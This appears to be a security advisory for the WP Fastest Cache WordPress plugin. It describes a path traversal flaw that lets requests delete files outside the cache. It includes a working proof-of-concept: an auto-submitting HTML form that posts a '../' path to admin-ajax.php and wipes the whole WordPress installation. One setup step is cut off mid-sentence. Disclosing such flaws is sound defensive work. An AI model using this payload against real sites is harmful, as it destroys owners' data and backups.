The WP Fastest Cache plugin contains multiple vulnerabilities that can allow an attacker to delete all files on the Wordpress installation.
We discovered that the WP Fastest Cache plugin allowed users to delete files and directories. When doing so, the plugin did not check for and remove the text
../ in the path of the user controlled value. This would have allowed us to delete the entire WordPress installation, including any backups.
WARNING: This replication process is destructive, and is included for information purposes only. Do not follow these steps on a production system.
Ensure that WP Fastest Cache has been set up and enabled (including ticking
Then set up a local copy (hostname
temporarycopy.local in this example).
Create an HTML file containing the following code, and save it on your local drive:
<html> <head><title>t</title></head> <body> <form id="form" action="https://temporarycopy.local/wp-admin/admin-ajax.php?path=/../../../.." method="post"> <input type="hidden" name="action" value="wpfc_delete_current_page_cache"/> </form> <script>document.form.submit();</script> </body> </html>
Log into WordPress, and then visit the HTML file you have just created. The entire website will be deleted.
Upgrade to version 0.9.0.3 when it is released.